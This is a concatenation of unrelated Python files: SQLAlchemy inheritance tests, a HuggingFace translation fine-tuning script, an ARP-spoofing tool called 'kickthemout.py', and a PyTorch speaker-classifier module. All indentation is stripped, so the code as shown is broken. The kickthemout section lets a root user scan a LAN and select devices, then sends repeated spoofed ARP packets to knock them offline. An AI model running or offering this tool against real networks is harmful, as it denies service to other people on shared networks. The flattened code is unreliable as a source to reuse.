"C" row that has no joined row, which will cause object
deleted errors.
"""
B = self.classes.B
sess = Session()
b1 = B()
b1.class_name = "c"
sess.add(b1)
assert_raises_message(
sa_exc.SAWarning,
"Flushing object %s with incompatible "
"polymorphic identity 'c'; the object may not "
"refresh and/or load correctly" % instance_str(b1),
sess.flush,
)
def test_entirely_oob_assignment(self):
"""test warn on an unknown polymorphic identity."""
B = self.classes.B
sess = Session()
b1 = B()
b1.class_name = "xyz"
sess.add(b1)
assert_raises_message(
sa_exc.SAWarning,
"Flushing object %s with incompatible "
"polymorphic identity 'xyz'; the object may not "
"refresh and/or load correctly" % instance_str(b1),
sess.flush,
)
    def test_not_set_on_update(self):
C = self.classes.C
sess = Session()
c1 = C()
sess.add(c1)
sess.commit()
sess.expire(c1)
c1.data = "foo"
sess.flush()
    def test_validate_on_update(self):
C = self.classes.C
sess = Session()
c1 = C()
sess.add(c1)
sess.commit()
sess.expire(c1)
c1.class_name = "b"
assert_raises_message(
sa_exc.SAWarning,
"Flushing object %s with incompatible "
"polymorphic identity 'b'; the object may not "
"refresh and/or load correctly" % instance_str(c1),
sess.flush,
)
class CascadeTest(fixtures.MappedTest):
"""that cascades on polymorphic relationships continue
cascading along the path of the instance's mapper, not
the base mapper."""
@classmethod
def define_tables(cls, metadata):
global t1, t2, t3, t4
t1 = Table(
"t1",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
)
t2 = Table(
"t2",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("t1id", Integer, ForeignKey("t1.id")),
Column("type", String(30)),
Column("data", String(30)),
)
t3 = Table(
"t3",
metadata,
Column("id", Integer, ForeignKey("t2.id"), primary_key=True),
Column("moredata", String(30)),
)
t4 = Table(
"t4",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("t3id", Integer, ForeignKey("t3.id")),
Column("data", String(30)),
)
def test_cascade(self):
class T1(fixtures.BasicEntity):
pass
class T2(fixtures.BasicEntity):
pass
class T3(T2):
pass
class T4(fixtures.BasicEntity):
pass
mapper(T1, t1, properties={"t2s": relationship(T2, cascade="all")})
mapper(T2, t2, polymorphic_on=t2.c.type, polymorphic_identity="t2")
mapper(
T3,
t3,
inherits=T2,
polymorphic_identity="t3",
properties={"t4s": relationship(T4, cascade="all")},
)
mapper(T4, t4)
sess = create_session()
t1_1 = T1(data="t1")
t3_1 = T3(data="t3", moredata="t3")
t2_1 = T2(data="t2")
t1_1.t2s.append(t2_1)
t1_1.t2s.append(t3_1)
t4_1 = T4(data="t4")
t3_1.t4s.append(t4_1)
sess.add(t1_1)
assert t4_1 in sess.new
sess.flush()
sess.delete(t1_1)
assert t4_1 in sess.deleted
sess.flush()
class M2OUseGetTest(fixtures.MappedTest):
@classmethod
def define_tables(cls, metadata):
Table(
"base",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("type", String(30)),
)
Table(
"sub",
metadata,
Column("id", Integer, ForeignKey("base.id"), primary_key=True),
)
Table(
"related",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("sub_id", Integer, ForeignKey("sub.id")),
)
def test_use_get(self):
base, sub, related = (
self.tables.base,
self.tables.sub,
self.tables.related,
)
# test [ticket:1186]
class Base(fixtures.BasicEntity):
pass
class Sub(Base):
pass
class Related(Base):
pass
mapper(
Base, base, polymorphic_on=base.c.type, polymorphic_identity="b"
)
mapper(Sub, sub, inherits=Base, polymorphic_identity="s")
mapper(
Related,
related,
properties={
# previously, this was needed for the comparison to occur:
# the 'primaryjoin' looks just like "Sub"'s "get" clause
# (based on the Base id), and foreign_keys since that join
# condition doesn't actually have any fks in it
# 'sub':relationship(Sub,
# primaryjoin=base.c.id==related.c.sub_id,
# foreign_keys=related.c.sub_id)
# now we can use this:
"sub": relationship(Sub)
},
)
assert class_mapper(Related).get_property("sub").strategy.use_get
sess = create_session()
s1 = Sub()
r1 = Related(sub=s1)
sess.add(r1)
sess.flush()
sess.expunge_all()
r1 = sess.query(Related).first()
s1 = sess.query(Sub).first()
def go():
assert r1.sub
self.assert_sql_count(testing.db, go, 0)
class GetTest(fixtures.MappedTest):
@classmethod
def define_tables(cls, metadata):
global foo, bar, blub
foo = Table(
"foo",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("type", String(30)),
Column("data", String(20)),
)
bar = Table(
"bar",
metadata,
Column("id", Integer, ForeignKey("foo.id"), primary_key=True),
Column("bar_data", String(20)),
)
blub = Table(
"blub",
metadata,
Column(
"blub_id",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("foo_id", Integer, ForeignKey("foo.id")),
Column("bar_id", Integer, ForeignKey("bar.id")),
Column("blub_data", String(20)),
)
@classmethod
def setup_classes(cls):
class Foo(cls.Basic):
pass
class Bar(Foo):
pass
class Blub(Bar):
pass
def test_get_polymorphic(self):
self._do_get_test(True)
def test_get_nonpolymorphic(self):
self._do_get_test(False)
def _do_get_test(self, polymorphic):
foo, Bar, Blub, blub, bar, Foo = (
self.tables.foo,
self.classes.Bar,
self.classes.Blub,
self.tables.blub,
self.tables.bar,
self.classes.Foo,
)
if polymorphic:
mapper(
Foo, foo, polymorphic_on=foo.c.type, polymorphic_identity="foo"
)
mapper(Bar, bar, inherits=Foo, polymorphic_identity="bar")
mapper(Blub, blub, inherits=Bar, polymorphic_identity="blub")
else:
mapper(Foo, foo)
mapper(Bar, bar, inherits=Foo)
mapper(Blub, blub, inherits=Bar)
sess = create_session()
f = Foo()
b = Bar()
bl = Blub()
sess.add(f)
sess.add(b)
sess.add(bl)
sess.flush()
if polymorphic:
def go():
assert sess.query(Foo).get(f.id) is f
assert sess.query(Foo).get(b.id) is b
assert sess.query(Foo).get(bl.id) is bl
assert sess.query(Bar).get(b.id) is b
assert sess.query(Bar).get(bl.id) is bl
assert sess.query(Blub).get(bl.id) is bl
# test class mismatches - item is present
# in the identity map but we requested a subclass
<reponame>cdleong/transformers
#!/usr/bin/env python
# coding=utf-8
# Copyright The HuggingFace Team and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for sequence to sequence.
"""
# You can also adapt this script on your own sequence to sequence task. Pointers for this are left as comments.
import logging
import os
import sys
from dataclasses import dataclass, field
from typing import Optional
import numpy as np
from datasets import load_dataset, load_metric
import transformers
from transformers import (
AutoConfig,
AutoModelForSeq2SeqLM,
AutoTokenizer,
DataCollatorForSeq2Seq,
HfArgumentParser,
M2M100Tokenizer,
MBart50Tokenizer,
MBart50TokenizerFast,
MBartTokenizer,
MBartTokenizerFast,
Seq2SeqTrainer,
Seq2SeqTrainingArguments,
default_data_collator,
set_seed,
)
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import check_min_version
from transformers.utils.versions import require_version
# Will error if the minimal version of Transformers is not installed. Remove at your own risks.
check_min_version("4.8.0.dev0")
require_version("datasets>=1.8.0", "To fix: pip install -r examples/pytorch/translation/requirements.txt")
logger = logging.getLogger(__name__)
# A list of all multilingual tokenizers that require src_lang and tgt_lang attributes.
MULTILINGUAL_TOKENIZERS = [MBartTokenizer, MBartTokenizerFast, MBart50Tokenizer, MBart50TokenizerFast, M2M100Tokenizer]
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
"""
model_name_or_path: str = field(
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where to store the pretrained models downloaded from huggingface.co"},
)
use_fast_tokenizer: bool = field(
default=True,
metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": "Will use the token generated when running `transformers-cli login` (necessary to use this script "
"with private models)."
},
)
@dataclass
class DataTrainingArguments:
"""
    Arguments pertaining to what data we are going to input to our model for training and evaluation.
"""
source_lang: str = field(default=None, metadata={"help": "Source language id for translation."})
target_lang: str = field(default=None, metadata={"help": "Target language id for translation."})
dataset_name: Optional[str] = field(
default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."}
)
dataset_config_name: Optional[str] = field(
default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
)
train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a jsonlines)."})
validation_file: Optional[str] = field(
default=None,
metadata={
"help": "An optional input evaluation data file to evaluate the metrics (sacreblue) on "
"a jsonlines file."
},
)
test_file: Optional[str] = field(
default=None,
metadata={
"help": "An optional input test data file to evaluate the metrics (sacreblue) on " "a jsonlines file."
},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
preprocessing_num_workers: Optional[int] = field(
default=None,
metadata={"help": "The number of processes to use for the preprocessing."},
)
max_source_length: Optional[int] = field(
default=1024,
metadata={
"help": "The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded."
},
)
max_target_length: Optional[int] = field(
default=128,
metadata={
"help": "The maximum total sequence length for target text after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded."
},
)
val_max_target_length: Optional[int] = field(
default=None,
metadata={
"help": "The maximum total sequence length for validation target text after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded. Will default to `max_target_length`."
"This argument is also used to override the ``max_length`` param of ``model.generate``, which is used "
"during ``evaluate`` and ``predict``."
},
)
pad_to_max_length: bool = field(
default=False,
metadata={
"help": "Whether to pad all samples to model maximum sentence length. "
"If False, will pad the samples dynamically when batching to the maximum length in the batch. More "
"efficient on GPU but very bad for TPU."
},
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
},
)
max_predict_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of prediction examples to this "
"value if set."
},
)
num_beams: Optional[int] = field(
default=None,
metadata={
"help": "Number of beams to use for evaluation. This argument will be passed to ``model.generate``, "
"which is used during ``evaluate`` and ``predict``."
},
)
ignore_pad_token_for_loss: bool = field(
default=True,
metadata={
"help": "Whether to ignore the tokens corresponding to padded labels in the loss computation or not."
},
)
source_prefix: Optional[str] = field(
default=None, metadata={"help": "A prefix to add before every source text (useful for T5 models)."}
)
forced_bos_token: Optional[str] = field(
default=None,
metadata={
"help": "The token to force as the first generated token after the :obj:`decoder_start_token_id`."
"Useful for multilingual models like :doc:`mBART <../model_doc/mbart>` where the first generated token "
"needs to be the target language token.(Usually it is the target language token)"
},
)
def __post_init__(self):
if self.dataset_name is None and self.train_file is None and self.validation_file is None:
raise ValueError("Need either a dataset name or a training/validation file.")
elif self.source_lang is None or self.target_lang is None:
raise ValueError("Need to specify the source language and the target language.")
if self.train_file is not None:
extension = self.train_file.split(".")[-1]
assert extension == "json", "`train_file` should be a json file."
if self.validation_file is not None:
extension = self.validation_file.split(".")[-1]
assert extension == "json", "`validation_file` should be a json file."
if self.val_max_target_length is None:
self.val_max_target_length = self.max_target_length
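# A minimal, hypothetical invocation of this script (assuming it is saved as run_translation.py;
# the flag names come from the dataclasses above and the standard Seq2SeqTrainingArguments, while
# the model and dataset names are only examples):
#   python run_translation.py \
#       --model_name_or_path Helsinki-NLP/opus-mt-en-ro \
#       --source_lang en --target_lang ro \
#       --dataset_name wmt16 --dataset_config_name ro-en \
#       --output_dir ./opus-mt-en-ro-finetuned --do_train --do_eval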
def main():
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, Seq2SeqTrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
handlers=[logging.StreamHandler(sys.stdout)],
)
logger.setLevel(logging.INFO if training_args.should_log else logging.WARN)
# Log on each process the small summary:
logger.warning(
f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}"
+ f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
)
# Set the verbosity to info of the Transformers logger (on main process only):
if training_args.should_log:
transformers.utils.logging.set_verbosity_info()
logger.info(f"Training/evaluation parameters {training_args}")
if data_args.source_prefix is None and model_args.model_name_or_path in [
"t5-small",
"t5-base",
"t5-large",
"t5-3b",
"t5-11b",
]:
logger.warning(
"You're running a t5 model but didn't provide a source prefix, which is expected, e.g. with "
"`--source_prefix 'translate English to German: ' `"
)
# Detecting last checkpoint.
last_checkpoint = None
if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
last_checkpoint = get_last_checkpoint(training_args.output_dir)
if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to overcome."
)
elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
logger.info(
f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
"the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
# Set seed before initializing model.
set_seed(training_args.seed)
# Get the datasets: you can either provide your own JSON training and evaluation files (see below)
    # or just provide the name of one of the public datasets available on the hub
<filename>kickthemout.py
#!/usr/bin/env python
# -.- coding: utf-8 -.-
# kickthemout.py
# authors: k4m4 & xdavidhu
"""
Copyright (C) 2016 <NAME> (<EMAIL>) & <NAME> (<EMAIL>)
See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject)
"""
import time, os, sys, logging, math
from time import sleep
import urllib2 as urllib
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
notRoot = False
try:
if os.geteuid() != 0:
print("\n{0}ERROR: KickThemOut must run as root. Try again with sudo/root:\n\t{1}$ sudo python kickthemout.py{2}\n").format(RED, GREEN, END)
notRoot = True
except:
# User is probably on windows
pass
if notRoot:
raise SystemExit
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up scapy!
try:
from scapy.all import *
import scan, spoof
except:
print("\n{0}ERROR: Requirements have not been properly satisfied. Please try running:\n\t{1}$ sudo pip install -r requirements.txt{2}").format(RED, GREEN, END)
print("\n{0}If you still get the same error, please submit an issue here:\n\t{1}https://github.com/k4m4/kickthemout/issues\n{2}").format(RED, BLUE, END)
raise SystemExit
def heading():
sys.stdout.write(GREEN + """
█ █▀ ▄█ ▄█▄ █ █▀ ▄▄▄▄▀ ▄ █ ▄███▄ █▀▄▀█ ████▄ ▄ ▄▄▄▄▀
█▄█ ██ █▀ ▀▄ █▄█ ▀▀▀ █ █ █ █▀ ▀ █ █ █ █ █ █ ▀▀▀ █
█▀▄ ██ █ ▀ █▀▄ █ ██▀▀█ ██▄▄ █ ▄ █ █ █ █ █ █
█ █ ▐█ █▄ ▄▀ █ █ █ █ █ █▄ ▄▀ █ █ ▀████ █ █ █
█ ▐ ▀███▀ █ ▀ █ ▀███▀ █ █▄ ▄█ ▀
▀ ▀ ▀ ▀ ▀▀▀
""" + END + BLUE +
'\n' + '{0}Kick Devices Off Your LAN ({1}KickThemOut{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(98) +
'\n' + 'Made With <3 by: {0}<NAME> ({1}k4m4{2}) & {0}<NAME> ({1}xdavidhu{2}){3}'.format(
YELLOW, RED, YELLOW, BLUE).center(111) +
'\n' + 'Version: {0}0.1{1}\n'.format(YELLOW, END).center(86))
def optionBanner():
print('\nChoose option from menu:\n')
sleep(0.2)
print('\t{0}[{1}1{2}]{3} Kick ONE Off').format(YELLOW, RED, YELLOW, WHITE)
sleep(0.2)
print('\t{0}[{1}2{2}]{3} Kick SOME Off').format(YELLOW, RED, YELLOW, WHITE)
sleep(0.2)
print('\t{0}[{1}3{2}]{3} Kick ALL Off').format(YELLOW, RED, YELLOW, WHITE)
sleep(0.2)
print('\n\t{0}[{1}E{2}]{3} Exit KickThemOut\n').format(YELLOW, RED, YELLOW, WHITE)
def runDebug():
print("\n\n{0}WARNING! An unknown error has occurred, starting debug...{1}").format(RED, END)
print(
"{0}Starting debug... (Please report this crash on 'https://github.com/k4m4/kickthemout/issues' with your private informations removed if necessary){1}").format(
RED, END)
print("{0}").format(RED)
try:
print("Current defaultGatewayMac: " + defaultGatewayMac)
except:
print ("Failed to print defaultGatewayMac...")
try:
print ("Reloading mac getter function...")
regenOnlineIPs()
print("Reloaded defaultGatewayMac: " + defaultGatewayMac)
except:
print ("Failed to reload mac getter function / to print defaultGatewayMac...")
try:
print ("Known gateway IP: " + defaultGatewayIP)
except:
print ("Failed to print defaultGatewayIP...")
try:
print ("Current hostslist array: ")
print hostsList
except:
print ("Failed to print hostsList array...")
print ("DEBUG FINISHED.\nShutting down...")
print("{0}").format(END)
raise SystemExit
def regenOnlineIPs():
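    # Rebuild the list of online IPs from the most recent network scan and (re)resolve the
    # default gateway's MAC address, prompting the user to enter it manually if it cannot be found.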
global onlineIPs
global defaultGatewayMac
global defaultGatewayMacSet
if not defaultGatewayMacSet:
defaultGatewayMac = ""
onlineIPs = []
for host in hostsList:
onlineIPs.append(host[0])
if not defaultGatewayMacSet:
if host[0] == defaultGatewayIP:
defaultGatewayMac = host[1]
if not defaultGatewayMacSet and defaultGatewayMac == "":
print("\n{0}ERROR: Default Gateway MAC Address could not be obtained. Please enter MAC manually.{1}\n").format(RED, END)
header = ("{0}kickthemout{1}> {2}Enter your gateway's MAC Address {3}(MM:MM:MM:SS:SS:SS): ".format(BLUE, WHITE, RED, END))
defaultGatewayMac = raw_input(header)
defaultGatewayMacSet = True
def scanNetwork():
global hostsList
try:
hostsList = scan.scanNetwork()
except KeyboardInterrupt:
print('\n\n{0}Thanks for dropping by.\nCatch ya later!{1}').format(GREEN, END)
raise SystemExit
except:
print("\n{0}ERROR: Network scanning failed. Please check your requirements configuration.{1}\n").format(RED, END)
raise SystemExit
regenOnlineIPs()
def kickoneoff():
os.system("clear||cls")
print("\n{0}kickONEOff{1} selected...{2}\n").format(RED, GREEN, END)
scanNetwork()
print("Online IPs: ")
for i in range(len(onlineIPs)):
mac = ""
for host in hostsList:
if host[0] == onlineIPs[i]:
mac = host[1]
vendor = resolveMac(mac)
print(" [{0}" + str(i) + "{1}] {2}" + str(onlineIPs[i]) + "{3}\t"+ vendor + "{4}").format(YELLOW, WHITE, RED, GREEN, END)
canBreak = False
while not canBreak:
try:
choice = int(raw_input("\nChoose a target: "))
one_target_ip = onlineIPs[choice]
canBreak = True
except KeyboardInterrupt:
return
except:
print("\n{0}ERROR: Please enter a number from the list!{1}").format(RED, END)
one_target_mac = ""
for host in hostsList:
if host[0] == one_target_ip:
one_target_mac = host[1]
if one_target_mac == "":
print("\nIP address is not up. Please try again.")
return
print("\n{0}Target: {1}" + one_target_ip).format(GREEN, END)
print("\n{0}Spoofing started... {1}").format(GREEN, END)
try:
while True:
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, one_target_ip, one_target_mac)
time.sleep(10)
except KeyboardInterrupt:
print("\n{0}Re-arping{1} target...{2}").format(RED, GREEN, END)
reArp = 1
while reArp != 10:
try:
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
except KeyboardInterrupt:
pass
except:
runDebug()
reArp += 1
time.sleep(0.5)
print("{0}Re-arped{1} target successfully.{2}").format(RED, GREEN, END)
def kicksomeoff():
os.system("clear||cls")
print("\n{0}kickSOMEOff{1} selected...{2}\n").format(RED, GREEN, END)
scanNetwork()
print("Online IPs: ")
for i in range(len(onlineIPs)):
mac = ""
for host in hostsList:
if host[0] == onlineIPs[i]:
mac = host[1]
vendor = resolveMac(mac)
print(" [{0}" + str(i) + "{1}] {2}" + str(onlineIPs[i]) + "{3}\t" + vendor + "{4}").format(YELLOW, WHITE, RED, GREEN, END)
canBreak = False
while not canBreak:
try:
choice = raw_input("\nChoose devices to target(comma-separated): ")
if ',' in choice:
some_targets = choice.split(",")
canBreak = True
else:
print("\n{0}ERROR: Please select more than 1 devices from the list.{1}\n").format(RED, END)
except KeyboardInterrupt:
return
some_ipList = ""
for i in some_targets:
try:
some_ipList += GREEN + "'" + RED + onlineIPs[int(i)] + GREEN + "', "
except KeyboardInterrupt:
return
except:
print("\n{0}ERROR: '{1}" + i + "{2}' is not in the list.{3}\n").format(RED, GREEN, RED, END)
return
some_ipList = some_ipList[:-2] + END
print("\n{0}Targets: {1}" + some_ipList).format(GREEN, END)
print("\n{0}Spoofing started... {1}").format(GREEN, END)
try:
while True:
for i in some_targets:
ip = onlineIPs[int(i)]
for host in hostsList:
if host[0] == ip:
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1])
time.sleep(10)
except KeyboardInterrupt:
print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END)
reArp = 1
while reArp != 10:
for i in some_targets:
ip = onlineIPs[int(i)]
for host in hostsList:
if host[0] == ip:
try:
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
except KeyboardInterrupt:
pass
except:
runDebug()
reArp += 1
time.sleep(0.5)
print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END)
def kickalloff():
os.system("clear||cls")
print("\n{0}kickALLOff{1} selected...{2}\n").format(RED, GREEN, END)
scanNetwork()
print("Online IPs: ")
for i in range(len(onlineIPs)):
mac = ""
for host in hostsList:
if host[0] == onlineIPs[i]:
mac = host[1]
vendor = resolveMac(mac)
print(str(" {0}"+ str(onlineIPs[i]) + "{1}\t" + vendor + "{2}").format(RED, GREEN, END))
print("\n{0}Spoofing started... {1}").format(GREEN, END)
try:
reScan = 0
while True:
for host in hostsList:
if host[0] != defaultGatewayIP:
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1])
reScan += 1
if reScan == 4:
reScan = 0
scanNetwork()
time.sleep(10)
except KeyboardInterrupt:
print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END)
reArp = 1
while reArp != 10:
for host in hostsList:
if host[0] != defaultGatewayIP:
try:
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
except KeyboardInterrupt:
pass
except:
runDebug()
reArp += 1
time.sleep(0.5)
print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END)
def getDefaultInterface():
def long2net(arg):
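        # Convert a 32-bit netmask value to its CIDR prefix length, e.g.
        # 0xFFFFFF00 -> 32 - round(log2(0xFFFFFFFF - 0xFFFFFF00)) = 32 - 8 = 24.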
if (arg <= 0 or arg >= 0xFFFFFFFF):
raise ValueError("illegal netmask value", hex(arg))
return 32 - int(round(math.log(0xFFFFFFFF - arg, 2)))
def to_CIDR_notation(bytes_network, bytes_netmask):
network = scapy.utils.ltoa(bytes_network)
netmask = long2net(bytes_netmask)
net = "%s/%s" % (network, netmask)
if netmask < 16:
return None
return net
for network, netmask, _, interface, address in scapy.config.conf.route.routes:
if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0':
continue
if netmask <= 0 or netmask == 0xFFFFFFFF:
continue
net = to_CIDR_notation(network, netmask)
if interface != scapy.config.conf.iface:
continue
if net:
return interface
def getGatewayIP():
try:
getGateway_p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False)
return getGateway_p.src
except:
print("\n{0}ERROR: Gateway IP could not be obtained. Please enter IP manually.{1}\n").format(RED, END)
header = ('{0}kickthemout{1}> {2}Enter Gateway IP {3}(e.g. 192.168.1.1): '.format(BLUE, WHITE, RED, END))
gatewayIP = raw_input(header)
return gatewayIP
def getDefaultInterfaceMAC():
try:
defaultInterfaceMac = get_if_hwaddr(defaultInterface)
if defaultInterfaceMac == "" or not defaultInterfaceMac:
print(
"\n{0}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{1}\n").format(
RED, END)
header = ('{0}kickthemout{1}> {2}Enter MAC Address {3}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END))
defaultInterfaceMac = raw_input(header)
return defaultInterfaceMac
else:
return defaultInterfaceMac
except:
print("\n{0}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{1}\n").format(RED, END)
header = ('{0}kickthemout{1}> {2}Enter MAC Address {3}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END))
defaultInterfaceMac = raw_input(header)
return defaultInterfaceMac
def resolveMac(mac):
try:
url = "http://macvendors.co/api/vendorname/"
request = urllib.Request(url + mac, headers={'User-Agent': "API Browser"})
response = urllib.urlopen(request)
vendor = response.read()
vendor = vendor.decode("utf-8")
vendor = vendor[:25]
return vendor
except:
return "N/A"
def main():
heading()
print(
"\n{0}Using interface '{1}" + defaultInterface + "{2}' with mac address '{3}" + defaultInterfaceMac + "{4}'.\nGateway IP: '{5}"
+ defaultGatewayIP + "{6}' --> {7}" + str(len(hostsList)) + "{8} hosts are up.{9}").format(GREEN, RED, GREEN, RED, GREEN,
RED, GREEN, RED, GREEN, END)
if len(hostsList) == 0 or len(hostsList) == 1:
if len(hostsList) == 1:
            if hostsList[0][0] ==
<reponame>entn-at/dropclass_speaker
import math
from collections import OrderedDict
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
'''
AdaCos and Ad margin loss taken from https://github.com/4uiiurz1/pytorch-adacos
'''
class DropClassBase(nn.Module):
def __init__(self, num_classes):
'''
        Base class which the other classifier heads should inherit from.
        It packages the wrapper methods that control which classes to include/ignore.
        The class has two main modes, toggled via .drop() and .nodrop(), which set which method will be
        called by .forward():
        forward_nodrop defines the ordinary behaviour, using all class columns
        forward_drop defines the behaviour in which only the remaining (non-ignored) class columns are used
'''
super(DropClassBase, self).__init__()
self.n_classes = num_classes
self.dropmode = False # Default is the normal behaviour
self.set_ignored_classes([])
self.combined_class_label = None
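    # A minimal usage sketch with a hypothetical concrete head and sizes:
    #   head = SoftMax(num_features=256, num_classes=1000)
    #   head.set_ignored_classes([3, 7])   # drop two classes
    #   head.drop()                        # forward() now scores only the 998 remaining classes
    #   logits = head(embeddings)
    #   head.nodrop()                      # back to scoring all 1000 classes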
def forward(self, input, label=None):
'''
input: (batch_size, num_features): FloatTensor
label (optional): (batch_size): LongTensor
'''
if self.dropmode:
if label is not None:
assert (torch.max(label) < len(self.rem_classes)), 'Contains label out of range of allowed classes: Have they been converted?'
return self.forward_drop(input, label=label)
else:
return self.forward_nodrop(input, label=label)
def drop(self):
self.dropmode = True
def nodrop(self):
self.dropmode = False
def forward_drop(self, input, label=None):
raise NotImplementedError
def forward_nodrop(self, input, label=None):
raise NotImplementedError
def set_ignored_classes(self, ignored:list):
if len(ignored) != 0:
assert min(ignored) >= 0
assert max(ignored) < self.n_classes
self.ignored = sorted(list(set(ignored)))
self.rem_classes = sorted(set(np.arange(self.n_classes)) - set(ignored))
self.ldict = OrderedDict({k:v for v, k in enumerate(self.rem_classes)}) #mapping of original label to new index
self.idict = OrderedDict({k:v for k, v in enumerate(self.rem_classes)}) #mapping of remaining indexes to original label
def set_remaining_classes(self, remaining:list):
assert min(remaining) >= 0
assert max(remaining) < self.n_classes
self.rem_classes = sorted(set(remaining))
self.ignored = sorted(set(np.arange(self.n_classes)) - set(remaining))
self.ldict = OrderedDict({k:v for v, k in enumerate(self.rem_classes)}) #mapping of original label to new index
self.idict = OrderedDict({k:v for k, v in enumerate(self.rem_classes)}) #mapping of remaining indexes to original label
def get_mini_labels(self, label:list):
# convert list of labels into new indexes for ignored classes
mini_labels = torch.LongTensor(list(map(lambda x: self.ldict[x], label)))
return mini_labels
def get_orig_labels(self, label:list):
# convert list of mini_labels into original class labels
# assert not self.combined_class_label, 'Combined classes means original labels not recoverable'
orig_labels = list(map(lambda x: self.idict[x], label))
return orig_labels
def set_remaining_classes_comb(self, remaining:list):
# remaining must not include the combined class
assert self.combined_class_label is not None, 'combined_class_label has not been set'
assert min(remaining) >= 0
assert max(remaining) < self.n_classes
remaining.append(self.combined_class_label)
self.rem_classes = sorted(set(remaining))
self.ignored = sorted(set(np.arange(self.n_classes)) - set(remaining)) # not really ignored, just combined
self.ldict = OrderedDict({k:v for v, k in enumerate(self.rem_classes)})
for k in self.ignored:
self.ldict[k] = self.combined_class_label # set all ignored classes to the combined class label
self.idict = OrderedDict({k:v for k, v in enumerate(self.rem_classes)}) # not the original mapping for comb classes
class DropAffine(DropClassBase):
def __init__(self, num_features, num_classes):
super(DropAffine, self).__init__(num_classes)
self.fc = nn.Linear(num_features, num_classes)
self.reset_parameters()
def reset_parameters(self):
self.fc.reset_parameters()
